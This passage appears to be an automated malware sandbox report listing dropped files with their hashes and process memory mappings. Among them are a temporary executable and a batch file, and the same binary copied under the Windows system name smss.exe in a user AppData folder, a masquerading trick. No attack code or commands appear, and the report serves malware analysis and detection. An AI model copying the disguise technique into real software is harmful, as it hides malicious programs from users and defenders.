                    888d17cb6f3dd87cbaa9480a4846df9b7517ec9e29ba0a44c295760b8470221cd3ba9b77450252e83bb4a5001f6d7cda5ee842d895ee49b611a424bb96d59bf6

                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

                    MD5

                    9773b0bfd3bc9fd0e830c05f6866c343

                    SHA1

                    8f49992bcf3e421e5fe988806cc3e0613a321e3a

                    SHA256

                    b730c7e0aac4cb57181ea00b923a96ad563f5fb5774f1f767eede0edfd5e6cbc

                    SHA512

                    1561825209673dcecd583105dd378417febeaa802737c622cdbdd05bd86a4d52c5ccc67595de3bb9437193b0becd9e5cb1a9406821dd4f92a2c8610bf31bc10f

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DRMDU4BX\EEUV2G9N.htm

                    MD5

                    b1cd7c031debba3a5c77b39b6791c1a7

                    SHA1

                    e5d91e14e9c685b06f00e550d9e189deb2075f76

                    SHA256

                    57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

                    SHA512

                    d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZIIA2USJ\YSR9BGOA.htm

                    MD5

                    8615e70875c2cc0b9db16027b9adf11d

                    SHA1

                    4ed62cf405311c0ff562a3c59334a15ddc4f1bf9

                    SHA256

                    da96949ba6b0567343f144486505c8c8fa1d892fd88c9cbc3ef3d751a570724d

                    SHA512

                    cd9dfc88dc2af9438b7d6b618d1b62029b3bdf739fc4daa5b37397afd12c4528561b3bf2fc3f3f2adf3fd1f582d5524332441fd30248fcd078e41aa91e17cb73

                  • C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe

                    MD5

                    de904e0d5b71c0c3d99430b61d40aae2

                    SHA1

                    5e1add3f70404f2110c389674e481484365eead4

                    SHA256

                    43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

                    SHA512

                    25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

                  • C:\Users\Admin\AppData\Local\Temp\jbqvTZJz.exe

                    MD5

                    de904e0d5b71c0c3d99430b61d40aae2

                    SHA1

                    5e1add3f70404f2110c389674e481484365eead4

                    SHA256

                    43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

                    SHA512

                    25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

                  • C:\Users\Admin\AppData\Local\Temp\~temp001.bat

                    MD5

                    ef572e2c7b1bbd57654b36e8dcfdc37a

                    SHA1

                    b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

                    SHA256

                    e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

                    SHA512

                    b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe

                    MD5

                    de904e0d5b71c0c3d99430b61d40aae2

                    SHA1

                    5e1add3f70404f2110c389674e481484365eead4

                    SHA256

                    43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

                    SHA512

                    25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe

                    MD5

                    de904e0d5b71c0c3d99430b61d40aae2

                    SHA1

                    5e1add3f70404f2110c389674e481484365eead4

                    SHA256

                    43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

                    SHA512

                    25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe

                    MD5

                    de904e0d5b71c0c3d99430b61d40aae2

                    SHA1

                    5e1add3f70404f2110c389674e481484365eead4

                    SHA256

                    43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b

                    SHA512

                    25f086b82e86fcef30474d13e723980f43fccdd473b0e3f556b78b434494c2b22a3e3b765fbf2647aeb030e814a1eea1fdfe6d35e894449880780d6f3732d3f0

                  • memory/1148-171-0x0000000000D00000-0x0000000000E44000-memory.dmp

                  • memory/1148-169-0x0000000000000000-mapping.dmp

                  • memory/1824-163-0x0000000000000000-mapping.dmp

                  • memory/1900-165-0x0000000000000000-mapping.dmp

                  • memory/2764-120-0x00000278B04A0000-0x00000278B04A1000-memory.dmp

                  • memory/2764-115-0x0000000000000000-mapping.dmp

                  • memory/2764-132-0x00000278AEB20000-0x00000278AEB22000-memory.dmp

                  • memory/2764-133-0x00000278AEB23000-0x00000278AEB25000-memory.dmp

                  • memory/2764-126-0x00000278C94B0000-0x00000278C94B1000-memory.dmp

                  • memory/2764-134-0x00000278AEB26000-0x00000278AEB28000-memory.dmp

                  • memory/2832-168-0x0000000000000000-mapping.dmp

                  • memory/2892-174-0x0000000000000000-mapping.dmp

                  • memory/2960-114-0x0000000000000000-mapping.dmp

                  • memory/2976-175-0x0000000000000000-mapping.dmp

                  • memory/3032-167-0x0000000000000000-mapping.dmp

                  • memory/3124-173-0x0000000000000000-mapping.dmp

                  • memory/3272-176-0x0000000000000000-mapping.dmp

                  • memory/3588-162-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

                  • memory/3588-152-0x0000000000000000-mapping.dmp

                  • memory/3604-164-0x0000000000000000-mapping.dmp

                  • memory/3732-166-0x0000000000000000-mapping.dmp

                  • memory/3924-147-0x0000000000BB0000-0x0000000000CF4000-memory.dmp

                  • memory/3924-148-0x0000000000400000-0x000000000054B000-memory.dmp

                  • memory/3924-143-0x0000000000000000-mapping.dmp

                  • memory/4040-161-0x0000000000E00000-0x0000000000F44000-memory.dmp

                  • memory/4040-149-0x0000000000000000-mapping.dmp